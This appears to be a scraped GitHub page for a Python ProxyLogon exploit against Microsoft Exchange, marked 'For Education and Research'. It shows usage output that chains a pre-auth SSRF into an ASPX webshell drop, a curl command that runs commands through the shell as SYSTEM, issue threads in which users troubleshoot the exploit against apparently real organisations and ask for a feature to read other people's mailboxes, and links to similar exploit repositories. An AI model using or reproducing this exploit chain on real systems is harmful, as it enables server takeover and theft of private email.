ProxyLogon Pre-Auth SSRF To Arbitrary File Write

Overview

ProxyLogon Pre-Auth SSRF To Arbitrary File Write

For Education and Research

Usage:

C:\>python proxylogon.py mail.evil.corp [email protected]
Attacking target mail.evil.corp
=============================
Got DN: /o=EVIL CORP/ou=first administrative group/cn=Recipients/cn=Administrator
Got SID: S-1-5-21-175943541-xxxxxxxxxx-3152120021-500
Got session id: a99eda32-xxxx-xxxx-825b-5f1c4a6080e7
Got canary: rOWUk7lmAUC2-5HIlQ4EpGq1rPu959xxxxxxxxxx_xxxxxxx_xxx_a-KJ5WR-9j95yu-JOv3dFY.
=========== It means good to go!!!====
Got OAB id: 2f3d4600-xxxx-xxxx-xxxx-b4a4c1d3fb58
Successful!
(+) Webshell drop at https://mail.evil.corp/owa/auth/evilcorp.aspx
(+) Enjoy your shell: curl -ik https://mail.evil.corp/owa/auth/evilcorp.aspx -d 'exec_code=Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").stdout.readall())
CMD: whoami
nt authority\system
Comments
  • IndexError: list index out of range

    IndexError: list index out of range

    msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0] IndexError: list index out of range

    its mean target, not vuln? or it's my fault?

    opened by saeidshirazi 13
  • TypeError: a bytes-like object is required, not 'str'

    TypeError: a bytes-like object is required, not 'str'

    Traceback (most recent call last): File "C:\Users\m\Desktop\logs\New folder (2)000\Proxylogon-main\Proxylogon-main\proxylogon.py", line 75, in if "" not in ct.content: TypeError: a bytes-like object is required, not 'str'

    opened by MElbeshti 5
  • commands not executing

    commands not executing

    why is it possible to execute first time and get shell and receive responses from commands , the shell exists cause no 404 when you browse to it. but no commands executes or no results from command execution are returned ?

    opened by donjuanme 2
  • rbacRole not found

    rbacRole not found

    Got DN: /o=World Travel Centre/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=b80cd5b02dad4e0ebf16849183dc4c63-Admi Got SID: S-1-5-21-2867433882-3978468204-2437582583-500 Got session id: ba6e26b3-7120-4304-9950-becbd76c41f0 Got canary: 5Ip_ftGCY0utXt3RmuTR94N4jDAc6dgINADzDVSNY2XHZRQoH5Yal_ukueMSQVWRGqn1PQNuMhM. Wrong canary! Sometime we can skip this ... Traceback (most recent call last): File "c:\Users\undercover\Desktop\PX\Proxylogon-main\proxylogon.py", line 119, in rbacRole = ct.text.split("RBAC roles: ")[1].split("")[0] IndexError: list index out of range

    ============================ how can fix this? tested on some target all of them have this issue

    tested on win10 python 3.9

    opened by saeidshirazi 2
  • GetOAB Error!

    GetOAB Error!

    Got DN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=ab24791970e14c0dbb35163b29e8e456-admin Got SID: S-1-5-21-3765238651-1946275754-3596023858-500 Got session id: c31306a9-aa11-4d3d-8be9-842e3fad4cc7 Got canary: zVii2pyG8kO0KCxGS8M7noulX4-v79gIagXzNJWTeU5qDbTZSj-XrxxiQcxExTSjeV6VwDJfvPE. =========== It means good to go!!!==== GetOAB Error!

    any idea on what the issue maybe here?

    opened by donjuanme 1
  • email view and download

    email view and download

    any chance of you adding the feature of mail view or download for a valid user ?

    as i understand it, with the proxylogon bug you can view emails and download emails of a valid email without knowing the password of that email

    opened by donjuanme 1
  • This error has been fixed

    This error has been fixed

    File "proxylogon.py", line 98 if ct.status_code != 241 or not "msExchEcpCanary" in ct.headers["Set-Cookie"]::

    SyntaxError: invalid syntax

    opened by MrCakeGuy 1
  • Access Denied

    Access Denied

    Hello when i checked server its condition seems vulnerable but when i try to read messages from email it says Access Denied what i can do as remedy ? Thx

    opened by HJ23 1
  • File ">

    File "proxylogon.py", line 65, in

    Hey, can u help me plz? What do i wrong?

    Attacking target ex01.test.local

    Got DN: /o=test/ou=Exchange Administrative Group (FYDIBOHF9546LRG)/cn=Recipients/cn=user5e1sdf71 Traceback (most recent call last): File "proxylogon.py", line 65, in mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00" UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 5: ordinal not in range(128)

    opened by 13Ragna37 0
Owner
lulz
retarded kid trying to use internet
lulz
ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)

ProxyLogon For Python3 ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell) usage: python ProxyLogon.py --host=exchang

null 112 Dec 1, 2022
Some Attacks of Exchange SSRF ProxyLogon&ProxyShell

Some Attacks of Exchange SSRF This project is heavily replicated in ProxyShell, NtlmRelayToEWS https://mp.weixin.qq.com/s/GFcEKA48bPWsezNdVcrWag Get 1

Jumbo 129 Dec 30, 2022
ProxyShell POC Exploit : Exchange Server RCE (ACL Bypass + EoP + Arbitrary File Write)

ProxyShell Install git clone https://github.com/ktecv2000/ProxyShell cd ProxyShell virtualenv -p $(which python3) venv source venv/bin/activate pip3 i

Poming huang 312 Dec 9, 2022
ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)

ExProlog ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065) Usage: exprolog.py [OPTIONS] ExProlog -

Herwono W. Wijaya 130 Dec 15, 2022
Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1

CVE-2021-22911 Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1 The getPasswordPolicy method is vulnerable to NoS

Enox 47 Nov 9, 2022
CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection Usage usage: cve-2021-26084_confluence_rce.py [-h] --url URL [--cmd CMD] [--shell] CVE-2021-2

r0cky 92 Jul 20, 2022
Exploit grafana Pre-Auth LFI

Grafana-LFI-8.x Exploit grafana Pre-Auth LFI How to use python3

null 2 Jul 25, 2022
POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL Pre-Auth RCE Injection Vulneralibity.

CVE-2021-26084 Description POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL(Object-Graph Navigation Language) Pre-Auth RCE Injection V

antx 9 Aug 31, 2022
A Burp extension adding a passive scan check to flag parameters whose name or value may indicate a possible insertion point for SSRF or LFI.

BurpParamFlagger A Burp extension adding a passive scan check to flag parameters whose name or value may indicate a possible insertion point for SSRF

Allyson O'Malley 118 Nov 7, 2022
CVE-2021-26855 SSRF Exchange Server

CVE-2021-26855 Brute Force EMail Exchange Server Timeline: Monday, March 8, 2021: Update Dumping content...(I'm not done, can u guy help me done this

lulz 117 Nov 28, 2022
exchange-ssrf-rce

Usage python3 .\exchange-exp.py -------------------------------------------------------------------------------- |

Jen 76 Nov 9, 2022
Apache Solr SSRF(CVE-2021-27905)

Solr-SSRF Apache Solr SSRF #Use [-] Apache Solr SSRF漏洞 (CVE-2021-27905) [-] Options: -h or --help : 方法说明 -u or --url

Henry4E36 70 Nov 9, 2022
SSRF search vulnerabilities exploitation extended.

This tool search for SSRF using predefined settings in different parts of a request (path, host, headers, post and get parameters).

Andri Wahyudi 13 Jul 4, 2021
This script checks for any possible SSRF dns/http interactions in xmlrpc.php pingback feature

rpckiller This script checks for any possible SSRF dns/http interactions in xmlrpc.php pingback feature and with that you can further try to escalate

Ashish Kunwar 33 Sep 23, 2022
A Burp Suite extension made to automate the process of finding reverse proxy path based SSRF.

TProxer A Burp Suite extension made to automate the process of finding reverse proxy path based SSRF. How • Install • Todo • Join Discord How it works

Krypt0mux 162 Nov 25, 2022
the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability

CVE-2021-22005-metasploit the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability pr

Taroballz 25 Nov 15, 2022
VMware vCenter earlier v(7.0.2.00100) unauthorized arbitrary file read

vcenter_fileread_exploit VMware vCenter earlier v(7.0.2.00100) unauthorized arbitrary file read Usage python3 vCenter_fileread.py http(s)://ip Referen

Ashish Kunwar 4 Sep 23, 2022
This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).

CVE-2021-43798 – Grafana Exploit About This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798

Pedro Havay 12 Nov 18, 2022
Exploit tool for Adminer 1.0 up to 4.6.2 Arbitrary File Read vulnerability

AdminerRead Exploit tool for Adminer 1.0 up to 4.6.2 Arbitrary File Read vulnerability Installation git clone https://github.com/p0dalirius/AdminerRea

Podalirius 58 Dec 5, 2022